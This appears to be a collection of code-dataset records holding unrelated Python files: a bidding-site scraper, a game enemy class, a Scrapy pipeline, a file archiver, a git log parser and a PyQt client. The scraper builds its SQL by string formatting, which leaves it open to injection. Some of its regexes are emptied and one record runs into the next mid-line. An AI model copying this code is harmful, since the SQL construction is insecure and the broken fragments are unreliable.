\"%Y-%m-%d\")))\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\r\n\t\t\t\tsql = \"INSERT INTO ztb_error_infos (catid,title,style,addtime,adddate,areaid,status,linkurl,content) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');\" % (\r\n\t\t\t\t\titems['type_id'], items['title'], items['source_name'], items['time'], items['web_time'],\r\n\t\t\t\t\titems['addr_id'], 3, items['url'], pymysql.escape_string(items['intro']))\r\n\t\t\t\tself.cur.execute(sql)\r\n\t\t\t\tself.conn.commit()\r\n\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tprint(\"数据上传失败\")\r\n\t\t\tprint(items['title'])\r\n\t\t\tprint(items['url'])\r\n\t\t\tprint(e)\r\n\r\n\r\n\tdef get_response(self, resource, driver):\r\n\t\tlist_content = etree.HTML(resource)\r\n\t\tlist_url = list_content.xpath('//div[@id=\"div1\"]//tr[@height=\"35px\"]')\r\n\t\tprint(len(list_url))\r\n\t\tif len(list_url) == 0:\r\n\t\t\tpass\r\n\t\tfor each_tr in list_url[:]:\r\n\t\t\titems = {}\r\n\t\t\titems['intro'] = ''\r\n\t\t\titems['addr_id'] = ''\r\n\t\t\titems['title'] = ''\r\n\t\t\titems['url'] = ''\r\n\t\t\titems['web_time'] = ''\r\n\t\t\titems[\"time\"] = '%.0f' % 
time.time()\r\n\r\n\t\t\titems['title'] = each_tr.xpath('.//span/@title')[0].strip()\r\n\r\n\t\t\t# 获取文章id、然后使用网页前缀拼接文章id获取到文章的真实id\r\n\t\t\tarticle_url = each_tr.xpath('.//span/@onclick')[0]\r\n\t\t\titems['url'] = self.base_url + re.search(r'window.open\\(\"(.*?)\",\"\",', article_url, re.S).group(1)\r\n\t\t\tprint(items['url'])\r\n\t\t\tjs = \"window.open({})\".format('\"' + items['url'] + '\"') # 可以看到是打开新的标签页 不是窗口\r\n\t\t\t# print(js)\r\n\t\t\ttime.sleep(0.01)\r\n\t\t\tSucess = True\r\n\t\t\t# while Sucess:\r\n\t\t\t# \ttry:\r\n\t\t\t# \t\tdriver.execute_script(js)\r\n\t\t\t# \t\tdriver.implicitly_wait(30)\r\n\t\t\t# \t\tSucess = False\r\n\t\t\t# \texcept:\r\n\t\t\t# \t\tdriver.switch_to_window(3)\r\n\t\t\t# \t\tdriver.refresh()\r\n\t\t\t# time.sleep(2.5)\r\n\t\t\ttry:\r\n\t\t\t\tdriver.execute_script(js)\r\n\t\t\t\tdriver.implicitly_wait(30)\r\n\t\t\texcept:\r\n\t\t\t\tdriver.switch_to_window(3)\r\n\t\t\t\tdriver.refresh()\r\n\t\t\tnow_handle = driver.current_window_handle\r\n\t\t\t# print(driver.window_handles, now_handle)\r\n\t\t\tdriver.switch_to_window(driver.window_handles[driver.window_handles.index(now_handle) + 1])\r\n\t\t\t# 获取日期\r\n\t\t\titems['web_time'] = each_tr.xpath('.//td/following-sibling::td/text()')[0].strip()\r\n\t\t\t# 获取到地址然后通过城市表获取城市id\r\n\t\t\ttry:\r\n\t\t\t\titems['address'] = each_tr.xpath('.//td[3]/text()')[0].strip()\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\t\tdirty_article = driver.page_source\r\n\t\t\t# print(dirty_article)\r\n\t\t\ttry:\r\n\t\t\t\t# print(1111111)\r\n\t\t\t\ttime.sleep(0.01)\r\n\t\t\t\tdirty_article = re.search(r'(.*?)',str(dirty_article), re.S).group(1)\r\n\t\t\t\tdirty_article = re.sub(r'href=\"', 'href=\"http://www.chinaunicombidding.cn', dirty_article, flags = re.S)\r\n\t\t\t\tdirty_article = re.sub(r'.*?', '', dirty_article, flags = re.S)\r\n\t\t\t\t# print(2222222)\r\n\t\t\t\t# 将文章的垃圾数据进行清洗\r\n\t\t\t\tclean_article = re.sub(regularExpression, ' ', dirty_article)\r\n\t\t\t\titems[\"intro\"] = clean_article\r\n\t\t\t\t# print(items[\"intro\"])\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(e)\r\n\t\t\t\tpass\r\n\r\n\t\t\t# 如果标题出现失败、基本可以证明是失败公示、所以将其纳入38257\r\n\t\t\tif '中标' in items['title'] or '成交' in items['title'] or '结果' in items['title'] or '失败' in items['title'] or '流标' in items['title'] or '候选人' in items['title'] or '中选人' in items['title'] or '作废' in items['title'] or '终止' in items['title']:\r\n\t\t\t\titems['type_id'] = '38257'\r\n\t\t\telif '更正' in items['title'] or '变更' in items['title'] or '答疑' in items['title'] or '澄清' in items['title'] or '补充' in items['title'] or '延期' in items['title']:\r\n\t\t\t\titems['type_id'] = '38256'\r\n\t\t\telse:\r\n\t\t\t\titems['type_id'] = '38255'\r\n\r\n\t\t\ttry:\r\n\t\t\t\tfor each_city in self.city_dict:\r\n\t\t\t\t\tif each_city in items['address']:\r\n\t\t\t\t\t\titems['addr_id'] = self.city_dict[each_city]\r\n\t\t\t\t\t\tbreak\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\r\n\t\t\t# 如果从地址栏找不到地址 则从标题获取\r\n\t\t\tif items['addr_id'] == '':\r\n\t\t\t\tfor each_city in self.city_dict:\r\n\t\t\t\t\tif each_city in items['title']:\r\n\t\t\t\t\t\titems['addr_id'] = self.city_dict[each_city]\r\n\t\t\t\t\t\tbreak\r\n\r\n\t\t\tif items['addr_id'] == '':\r\n\t\t\t\tfor each_pattern in self.pattern_list:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tsearch_text = re.search(each_pattern, dirty_article, re.S).group(1)\r\n\t\t\t\t\t\tfor city_name in self.city_dict:\r\n\t\t\t\t\t\t\tif city_name in search_text:\r\n\t\t\t\t\t\t\t\titems['addr_id'] = 
self.city_dict[city_name]\r\n\t\t\t\t\t\t\t\tbreak\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\t\tif items['addr_id'] != '':\r\n\t\t\t\t\t\tbreak\r\n\t\t\titems[\"source_name\"] = '中国联通采购与招标网'\r\n\t\t\tself.upload_items(items)\r\n\t\t\t# print(items['title'])\r\n\t\t\tdriver.close()\r\n\t\t\ttime.sleep(0.01)\r\n\t\t\tdriver.switch_to_window(driver.window_handles[driver.window_handles.index(now_handle)])\r\n\t\t\t# break\r\n\r\n\tdef crawl_first_page(self, driver):\r\n\t\tdriver.get('http://www.chinaunicombidding.cn/jsp/cnceb/web/info1/infoList.jsp?page=1&type=1')\r\n\t\tdriver.implicitly_wait(25)\r\n\t\tself.get_response(driver.page_source, driver)\r\n\r\n\tdef run(self):\r\n\t\tall_list_pages = []\r\n\t\tall_list_pages.extend([self.going_to_crawl_bid.format(i) for i in range(1, 20)])\r\n\t\tall_list_pages.extend([self.going_to_crawl_result.format(i) for i in range(1, 7)])\r\n\t\tall_list_pages.extend([self.going_to_crawl_single.format(i) for i in range(1, 3)])\r\n\t\tprint(len(all_list_pages))\r\n\t\twhile all_list_pages:\r\n\t\t\tprint(all_list_pages)\r\n\t\t\tdriver = webdriver.Chrome(executable_path='C:/Program Files (x86)/Google/Chrome/Application/chromedriver.exe',options=self.chrome_options)\r\n\r\n\t\t\ttime.sleep(1)\r\n\t\t\tcurrent_page = all_list_pages[0]\r\n\t\t\tjs = \"window.open({})\".format('\"' + self.duplicate_part + current_page + '\"') # 可以看到是打开新的标签页 不是窗口\r\n\t\t\t# print(js)\r\n\t\t\ttime.sleep(1)\r\n\t\t\tdriver.execute_script(js)\r\n\t\t\ttime.sleep(2)\r\n\t\t\tall_list_pages.pop(all_list_pages.index(all_list_pages[0]))\r\n\t\t\tdriver.implicitly_wait(20)\r\n\t\t\ttime.sleep(1)\r\n\t\t\tdriver.switch_to_window(driver.window_handles[1])\r\n\t\t\tcurrent_times = time.localtime(time.time())\r\n\t\t\tprint(current_times)\r\n\t\t\t# print(driver.page_source[:500])\r\n\t\t\tif ' cell.left:\n new.right = cell.left\n self.direction = not self.direction\n if last.left >= cell.right and new.left < cell.right:\n new.left = cell.right\n self.direction = not self.direction\n if last.bottom <= cell.top and new.bottom > cell.top:\n self.resting = True\n new.bottom = cell.top\n self.dy = 0\n if last.top >= cell.bottom and new.top < cell.bottom:\n new.top = cell.bottom\n self.dy = 0\n\n if self.rect.x >= game.width:\n self.rect.x = -15\n\n if self.rect.x <= -16:\n self.rect.x = game.width\n\n if self.rect.y >= game.height:\n self.is_dead = True\n","sub_path":"super-fruit-pie-master/gamelib/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"155990789","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nimport MySQLdb.cursors\nfrom twisted.enterprise import adbapi\n\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom scrapy.utils.project import get_project_settings\nimport os, logging\n\nSETTINGS = get_project_settings()\n\nclass AmazonCnCrawlerPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\n\n\nclass MySQLPipeline(object):\n\n\t@classmethod\n\tdef from_crawler(cls, crawler):\n\t\treturn cls(crawler.stats)\n\n\tdef __init__(self, stats):\n\t\t#Instantiate DB\n\t\tself.dbpool = 
adbapi.ConnectionPool('MySQLdb',\n\t\t\thost=SETTINGS['DB_HOST'],\n\t\t\tuser=SETTINGS['DB_USER'],\n\t\t\tpasswd=SETTINGS['DB_PASSWD'],\n\t\t\tport=SETTINGS['DB_PORT'],\n\t\t\tdb=SETTINGS['DB_DB'],\n\t\t\tcharset='utf8',\n\t\t\tuse_unicode = True,\n\t\t\tcursorclass=MySQLdb.cursors.DictCursor\n\t\t)\n\t\tself.stats = stats\n\t\tdispatcher.connect(self.spider_closed, signals.spider_closed)\n\tdef spider_closed(self, spider):\n\t\t""" Cleanup function, called after crawling has finished to close open\n\t\t\tobjects.\n\t\t\tClose ConnectionPool. """\n\t\tself.dbpool.close()\n\n\tdef process_item(self, item, spider):\n\t\tquery = self.dbpool.runInteraction(self.__insert_if_not_exist, item)\n\t\tquery.addErrback(self._handle_error)\n\t\treturn item\n\n\tdef __insert_if_not_exist(self,tx,item):\n\t\tsql = "SELECT id from amazon_item where amazon_id = %s"\n\t\tres = tx.execute(sql,(item['amazon_id'],))\n\t\tif res == 0:\n\t\t\tlogging.debug("Insert Amazon item (amazon_id=%s)." %item['amazon_id'])\n\t\t\t#1. Insert item into amazon_item\n\t\t\tsql = "INSERT INTO \\\n\t\t\t\t\t\tamazon_item (name,amazon_id,amazon_category_id,price,additional_charge,oversea_product,third_party,item_link,picture_url) \\\n\t\t\t\t\t\tVALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s)"\n\t\t\t\t\t\t\n\t\t\tresult = tx.execute(sql,(\n\t\t\t\t\t\t\t\t\titem['name'],\n\t\t\t\t\t\t\t\t\titem['amazon_id'],\n\t\t\t\t\t\t\t\t\titem['category_id'],\n\t\t\t\t\t\t\t\t\titem['price'],\n\t\t\t\t\t\t\t\t\titem['additionalCharge'],\n\t\t\t\t\t\t\t\t\titem['overseaProduct'],\n\t\t\t\t\t\t\t\t\titem['thirdParty'],\n\t\t\t\t\t\t\t\t\titem['itemLink'],\n\t\t\t\t\t\t\t\t\titem['pictureURL'],\n\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t)\n\t\t\t#2. Insert category into amazon_category if it does not exist yet\n\t\t\tcategoryInfoList = item['categoryPathInfo']\n\t\t\tcatIDs = [catID for (_,catID) in categoryInfoList]\n\t\t\tcatIDs = tuple(catIDs)\n\t\t\tsql = "SELECT distinct(amazon_category_id) from amazon_category where amazon_category_id in ("\n\t\t\tfor _ in categoryInfoList:\n\t\t\t\tsql=sql+"%s,"\n\t\t\tsql = sql[0:len(sql)-1]+")"\n\t\t\ttx.execute(sql,catIDs)\n\t\t\tresults = tx.fetchall()\n\t\t\texistedCatIDs = [row['amazon_category_id'].encode('utf-8') for row in results]\n\t\t\t\n\t\t\tsql = "insert into amazon_category (name,amazon_category_id,parent_category_id,category_path,category_display_path) values (%s,%s,%s,%s,%s)"\n\t\t\tcategory_path_nodes = []\n\t\t\tdisplay_path_nodes = []\n\t\t\tparentCategoryID = ""\n\t\t\tfor (catName,catID) in categoryInfoList:\n\t\t\t\tcategory_path_nodes.append(catID)\n\t\t\t\tdisplay_path_nodes.append(catName)\n\t\t\t\tif not existedCatIDs.__contains__(catID):\n\t\t\t\t\ttx.execute(sql,(catName,catID,parentCategoryID,",".join(category_path_nodes),">".join(display_path_nodes)))\n\t\t\t\tparentCategoryID = catID\n\n\t\t\tself.stats.inc_value('database/items_added')\n\t\telse:\n\t\t\tlogging.debug("Duplicated item(amazon_id=%s), ignore it!" %item['amazon_id'])\n\t\t\n\t\n\tdef _handle_error(self, e):\n\t\tlogging.error("DB operating ERROR:%s" %e) ","sub_path":"amazon_cn_crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}{"seq_id":"163620459","text":"p1_name = input("Player 1 name:")\np2_name = input("Player 2 name:")\nstart = input("Start game?")\nwhile start == "yes":\n\tgame_dict = {"rock": 1, "paper": 2,"scissor": 3}\n\tp1_choice = 
input(\"Player 1 turn:\")\n\tp2_choice = input(\"Player 2 turn:\")\n\tcompare = game_dict.get(p1_choice) - game_dict.get(p2_choice)\n\tif compare == 0:\n\t\tprint(\"Tie\")\n\telif compare in [-1,2]:\n\t\tprint(p2_name, \"wins!!!\")\n\telif compare in [1,-2]:\n\t\tprint(p1_name, \"winss!!!\")\n\tstart = input(\"Continue playing:\")\t\n","sub_path":"PP8.py","file_name":"PP8.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"202633821","text":"#!/usr/bin/python\r\n#THIS NEED TO BE HERE TO PROPERLY CALL THE SCRIPT WITHOUT THE PYTHON KEYWORD\r\n#THE COMMAND DOS2UNIX NEEDS TO BE RUN ANYTHIME THIS SCRIPT IS UPDATE ON A WINDOWS MACHINE\r\n\r\n###################################################################################### \r\n# Auto Archiver - Written By: Elliot Carter\r\n#\r\n# This Script takes in several different inputs for directory paths and archives the\r\n# folders/files inside based off of the names containing a specific string that represents \r\n# the month and year that the file was created in. It then zips the files together into monthly zips \r\n# and archives them into the specified folder.\r\n#\r\n###################################################################################### \r\n\r\n#Import \r\nimport os\r\nimport re\r\nimport glob\r\nimport shutil\r\nimport datetime\r\nimport time\r\nimport itertools\r\nimport zipfile\r\nfrom zipfile import ZipFile \r\n\r\n#Variable to delete files after archive 0 if you DO NOT want to delete and 1 if you DO####################\r\nDELETE_FILES = 0\r\n################################################################################\r\n\r\n#List of current PATH_TO_ENVIRONMENTS############################################################\r\nPATH_TO_ENVIRONMENTS = ['C:/dserver01/DEV/',\r\n 'C:/iserver01/ITE/',\r\n 'C:/sserver01/SYS/',\r\n 'C:/pserver01/PROD/']\r\n#Current Environment used in naming the zip file i.e. DEV, SYS, ITE, PROD\r\nENVIRONMENTS = ['DEV', 'ITE', 'SYS', 'PROD']\r\n\r\n##################################################################################################\r\n\r\n#List of all directories inside all environments with FOLDERS to zip\r\nPATH_TO_FOLDERS = ['Input/EODPolicy/Filtered/',\r\n 'Input/Events/Filtered/',\r\n 'Input/Party/Filtered/',\r\n 'Input/Policy/Filtered/',\r\n 'Input/Relationship/Filtered/',\r\n 'Input/Transaction/Filtered/',\r\n 'Process/archive/',] \r\n \r\n#List of all directories inside all environments with txt FILES to zip\r\nPATH_TO_FILES = ['Input/Party/',\r\n 'Process/reconciliation/','Process/archive/output/EODPolicy/',\r\n 'Process/archive/output/Events/',\r\n 'Process/archive/output/Party/',\r\n 'Process/archive/output/Policy/',\r\n 'Process/archive/output/Relationship/',\r\n 'Process/archive/output/Transaction/',\r\n ]\r\n \r\n#Pattern list of dates that need archiving for folders\r\nPATTERN_DATE_FOR_FOLDERS = ['08-..-2018',\r\n '09-..-2018',\r\n '10-..-2018', \r\n '11-..-2018',\r\n '12-..-2018',\r\n '01-..-2019',\r\n '02-..-2019',\r\n '03-..-2019', \r\n '04-..-2019']\r\n \r\n#Pattern list of dates that need archiving for files\r\nPATTERN_DATE_FOR_FILES = ['08..2018',\r\n '09..2018',\r\n '10..2018', \r\n '11..2018',\r\n '12..2018',\r\n '01..2019',\r\n '02..2019',\r\n '03..2019', \r\n '04..2019'] \r\n\r\n#Location where all zip file will be placed withing the current environment by month.. i.e. 
'//server/environmentName/zip_location/MM-YYYY' \r\nZIP_LOCATION = 'Zip/'\r\n\r\n#List of lists including all zips created and their files i.e.[zip_name,[zip_files]\r\nZIPS_CREATED = []\r\n \r\n#Creates the name of the zip file \r\n# date = month and year or the files being archived... i.e. 'MM-YYYY'\r\n# path_to_folder = path leading to but not including the file to be archived... i.e. 'Process/Archive/output/EODPolicy/' ##TRAILING / MUST BE INCLUDED IN PATH NAME ##\r\n# path_to_environment = path leading to the environment of the file to be archived.. i.e. //server/environmentName/' ##TRAILING / MUST BE INCLUDED IN PATH NAME ##\r\n#\r\n# Returns string containing the zip name\r\ndef get_zip_file_name(date, path_to_folder, path_to_environment):\r\n #split path_to_folder\r\n path_to_folder_split = path_to_folder.split('/') \r\n #insert the environment name into the front of the path list and then create zip name with list\r\n envIndex = PATH_TO_ENVIRONMENTS.index(path_to_environment) \r\n path_to_folder_split.insert(0,ENVIRONMENTS[envIndex])\r\n zip_file_name = ''.join(path_to_folder_split)+ '-' + date + '.zip'\r\n return zip_file_name \r\n\r\n\r\n#Takes a list of files their current directory the name of a zip and the location where the zips are to be placed and zips them all up and places them in specified directory.\r\n# \r\n# file_list = a list of paths to each file found matching the current patern... i.e. ['//server/environmentName/Process/Archive/output/Events\\\\EventCo18_00001.txt',...]\r\n# directory = path to current directory being searched... i.e. //server/environmentName/Process/Archive/output/Events/ \r\n# zip_file_name = the name of the file to be zipped... i.e. DEVInputEODPolicyFiltered-09-2018.zip\r\n# environment = path to current environment... i.e. //server/environmentName/\r\n# date = date of current search... i.e. 
MM-YYYY\r\n# delete_folder = boolean to delete the folder the files are in (1) for true or (0) for false\r\ndef archive_files(file_list,directory,zip_file_name,environment,date,delete_folder):\r\n zip_location = environment + ZIP_LOCATION + date + '/'\r\n orig_zip_file_name = zip_file_name\r\n zip_file_name = zip_location + zip_file_name\r\n #temp list for the files added to the zip\r\n temp_zip_file_list = []\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + 'Create zip file named: ' + zip_file_name)\r\n if not os.path.exists(zip_location):\r\n os.makedirs(zip_location) \r\n #variable for deleting the directory found after the archive\r\n dirToRemove = ''\r\n #writing files to a zipfile\r\n newZip = None\r\n try:\r\n newZip = zipfile.ZipFile(zip_file_name, 'w',zipfile.ZIP_DEFLATED)\r\n for file in file_list: \r\n newZip.write(file)\r\n temp_zip_file_list.append(file)\r\n \r\n finally:\r\n newZip.close() \r\n\r\n ############THIS NEXT LINES DELETE THE FILES AND EMPTY FOLDERS THAT HAVE JUST BEEN ARCHIVED##############\r\n if DELETE_FILES == 1:\r\n for file in file_list:\r\n dirToRemove = os.path.split(file)[0] \r\n try:\r\n os.remove(file)\r\n except OSError as e: # name the Exception `e`\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print (now + \"Failed with:\", e.strerror) # look what it says\r\n print (now + \"Error code:\", e.code)\r\n #if directory is empty and we want to delete the base folder\r\n if not os.listdir(dirToRemove):\r\n if delete_folder:\r\n try:\r\n shutil.rmtree(dirToRemove)\r\n except Exception as e:\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + ' ' + e)\r\n raise\r\n ########################################################################################\r\n \r\n temp_array = [str(orig_zip_file_name),temp_zip_file_list] \r\n ZIPS_CREATED.append(temp_array)\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + 'All files zipped successfully!') \r\n print(\" \") \r\n \r\n#Searches through all directories in the PATH_TO_FOLDERS list for any folders matching the PATTERN_DATE_FOR_FOLDERS list and archives \r\n#them by path and pattern and places them into the ZIP_LOCATION + MM-YYYY of the current environment.\r\n#\r\n# Returns Total Number of files found \r\ndef folders_archive():\r\n #var to hold boolean for deleting the folder containing the files\r\n delete_folder = 1\r\n #Total files found\r\n total_files = 0\r\n #loop through all dates in the dates to archive\r\n for date in PATTERN_DATE_FOR_FOLDERS:\r\n #convert date to dd-yyyy\r\n real_date = date[0:3] + date[6:10] \r\n #set environment variable\r\n for environment in PATH_TO_ENVIRONMENTS:\r\n #loop through every directory path that archives by folder\r\n for folder in PATH_TO_FOLDERS:\r\n #var for zip file name \r\n zip_file_name = get_zip_file_name(real_date,folder,environment)\r\n #var for list of filepaths including filename\r\n file_list = []\r\n #var to hold number of folders found per path\r\n num_folders = 0\r\n #create each full_path call\r\n full_path = environment+folder \r\n #validate full_path exists: if it does search through it Otherwise: print out directory does not exist\r\n if os.path.isdir(full_path):\r\n #update variable with the current directory of folders\r\n curr_dir_folders = 
next(os.walk(full_path))[1]\r\n #loop through all folders in current directory\r\n for folder in curr_dir_folders:\r\n #check all dates against the folder name\r\n if re.search(date,folder):\r\n #create pattern looking for all files in the current folder\r\n glob_pattern = full_path + folder + \"/*\"\r\n #add all files found to the file_list var\r\n file_list += glob.glob(glob_pattern) \r\n num_folders += 1\r\n #if folders are found containing files print where they were found and archive them\r\n if(num_folders > 0): \r\n #archiving will happen in this function call\r\n archive_files(file_list,full_path,zip_file_name,environment,real_date,delete_folder)\r\n total_files += num_folders\r\n else:\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + full_path + ' does not exist.') \r\n print(' ')\r\n return total_files \r\n \r\n#Searches through all directories in the PATH_TO_FILES list for any files of a specified file type (file_ext) matching the PATTERN_DATE_FOR_FOLDERS list and archives \r\n#them by path and pattern and places them into the ZIP_LOCATION + MM-YYYY of the current environment.\r\n#\r\n# file_ext = the extension of the type of file you want to archive. I.E. txt, csv, or * for all files\r\n#\r\n# Returns Total Number of files found \r\ndef files_archive(file_ext): \r\n #set environment variable\r\n for environment in PATH_TO_ENVIRONMENTS:\r\n #loop through every directory path that archives by folder\r\n for path in PATH_TO_FILES:\r\n #create each directory call\r\n directory = environment+path\r\n #validate directory exists: if it does print the directory \r\n if os.path.isdir(directory):\r\n #create pattern looking for all files in the current folder\r\n glob_pattern = directory + '*.' + file_ext\r\n #add all files found to the file_list var\r\n file_list = glob.glob(glob_pattern) \r\n #var to hold boolean for deleting the folder containing the files\r\n delete_folder = 0\r\n #var to hold total number of files found\r\n total_files = 0\r\n #var to hold zip name\r\n zip_file_name = '' #placeholder \r\n #var to hold current zip file name \r\n for date in PATTERN_DATE_FOR_FILES:\r\n #Convert date to dd-yyyy\r\n real_date = date[0:2] + '-' + date[4:8] \r\n files_to_archive = []\r\n #var to hold number of files found per directory\r\n num_files = 0\r\n for file in file_list:\r\n zip_file_name = get_zip_file_name(real_date,path,environment) \r\n if re.search(date,file):\r\n files_to_archive.append(file) \r\n num_files += 1\r\n total_files += 1\r\n if num_files != 0:\r\n #archive the files\r\n archive_files(files_to_archive,directory,zip_file_name,environment,real_date,delete_folder) \r\n else:\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + directory + ' does not exist.') \r\n return total_files\r\n \r\n#Runs the Program \r\ndef main():\r\n print('')\r\n print('------------------------- This is the start of a new output -------------------------')\r\n folders_archive()\r\n files_archive('csv')\r\n files_archive('txt')\r\n #Print summary of files archived\r\n print('')\r\n print('')\r\n print('')\r\n print('')\r\n print('')\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + str(len(ZIPS_CREATED)) + ' zipped archives created. 
See Below:')\r\n \r\n for list in sorted(ZIPS_CREATED):\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print (now + list[0]) \r\n print (now + 'with files') \r\n for file in list[1]:\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print (now + file)\r\n #current time to print at beginning of every output line\r\n now = str(datetime.datetime.now()) + \" - \"\r\n print(now + str(len(list[1])) + ' files zipped')\r\n \r\n print(now + str(len(ZIPS_CREATED)) + ' total zipped archives created.')\r\n print('')\r\n print('')\r\n print('')\r\n print('')\r\n print('')\r\n \r\n return 0\r\n\r\n#needed to run main \r\nif __name__ == \"__main__\": \r\n main()","sub_path":"AutoArchiver.py","file_name":"AutoArchiver.py","file_ext":"py","file_size_in_byte":15022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"432565837","text":"from collections import namedtuple\n\n\nLogEntry = namedtuple(\"LogEntry\", (\n \"short_hash\",\n \"long_hash\",\n \"summary\",\n \"raw_body\",\n \"author\",\n \"email\",\n \"datetime\"\n ))\n\n\nclass HistoryMixin():\n\n def log(self, limit=None, skip=None, author=None, fpath=None, start_end=None, reverse=False):\n\n log_output = self.git(\n \"log\",\n \"-{}\".format(limit) if limit else None,\n \"--skip={}\".format(skip) if skip else None,\n \"--author={}\".format(author) if author else None,\n \"--reverse\" if reverse else None,\n '--format=%h%n%H%n%s%n%an%n%ae%n%at%x00%B%x00%x00%n',\n \"{}..{}\".format(*start_end) if start_end else None,\n \"--\" if fpath else None,\n fpath\n ).strip(\"\\x00\")\n\n entries = []\n for entry in log_output.split(\"\\x00\\x00\\n\"):\n entry = entry.strip()\n if not entry:\n continue\n entry, raw_body = entry.split(\"\\x00\")\n\n short_hash, long_hash, summary, author, email, datetime = entry.split(\"\\n\")\n entries.append(LogEntry(short_hash, long_hash, summary, raw_body, author, email, datetime))\n\n return entries\n","sub_path":"core/git_mixins/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"405652729","text":"def scope_test():\n def do_local():\n spam = \"local spam\"\n\n def do_nonlocal():\n nonlocal spam\n spam = \"nonlocal spam\"\n\n def do_global():\n global spam\n spam = \"global spam\"\n\n spam = \"test spam\"\n do_local()\n print(\"After local assignment:\", spam)\n do_nonlocal()\n print(\"After nonlocal assignment:\", spam)\n do_global()\n print(\"After global assignment:\", spam)\n\nscope_test()\nprint(\"In global scope:\", spam)\n\nfor element in [1, 2, 3]:\n print(element)\n\nclass Reverse:\n \"\"\"Iterator for looping over a sequence backwards.\"\"\"\n def __init__(self, data):\n self.data = data\n self.index = len(data)\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index == 0:\n raise StopIteration\n self.index = self.index - 1\n return self.data[self.index]\n\nrev = Reverse('spam')\niter(rev)\nfor char in rev:\n print(char)\n\n","sub_path":"Novice/01-03/Latihan/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177599491","text":"import sys\r\nfrom PyQt5 import QtCore\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import QMainWindow\r\nimport 
login\r\nfrom socket import *\r\nfrom PyQt5.QtWidgets import QApplication\r\nimport systemTray\r\n\r\nclass Window(QMainWindow):\r\n def __init__(self):\r\n QMainWindow.__init__(self)\r\n #서버연결\r\n port = 3333\r\n self.clientSock = socket(AF_INET, SOCK_STREAM)\r\n self.clientSock.connect(('34.84.112.149', port))\r\n #self.clientSock.connect(('192.168.0.6', port))\r\n # self.clientSock.connect(('192.168.43.36', port))\r\n # self.clientSock.connect(('192.168.25.22', port))\r\n #self.clientSock.connect(('192.168.0.31', port))\r\n #self.clientSock.connect(('172.30.1.58', port)) \r\n #self.clientSock.connect(('172.30.1.21', port)) \r\n\r\n #트레이 아이콘 생성\r\n self.tray = systemTray.SystemTrayIcon(self)\r\n\r\n # 첫 화면 로그인 설정\r\n self.user = {'email':'','bb_url':'','is_prof':''}\r\n self.login = login.login(self)\r\n\r\n self.init_window()\r\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\r\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\r\n self.setContentsMargins(0,0,5,5)\r\n self.oldPos = self.pos()\r\n\r\n def quitClicked(self):\r\n commend = 'exit'\r\n self.clientSock.send(commend.encode('utf-8'))\r\n QApplication.quit()\r\n\r\n def init_window(self):\r\n self.setCentralWidget(self.login)\r\n\r\n def mousePressEvent(self, event):\r\n self.oldPos = event.globalPos()\r\n\r\n def mouseMoveEvent(self, event):\r\n delta = QPoint(event.globalPos() - self.oldPos)\r\n self.move(self.x() + delta.x(), self.y() + delta.y())\r\n self.oldPos = event.globalPos()\r\n\r\nif __name__ == '__main__':\r\n\r\n app = QApplication(sys.argv)\r\n w = Window()\r\n w.show()\r\n sys.exit(app.exec_())","sub_path":"client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"202752016","text":"\"\"\"Toggles background of views between white and black\"\"\"\n\n__author__ = 'Brett Beckemeyer (bbeckemeyer@cannondesign.com)'\nfrom pyrevit import revit, DB\nfrom pyrevit import script\nfrom pyrevit.coreutils.ribbon import ICON_MEDIUM\n\n# for timing -------------------------------------------------------------------\nfrom pyrevit.coreutils import Timer\ntimer = Timer()\n# ------------------------------------------------------------------------------\n\n\nfrom System.Collections.Generic import List\n\nimport 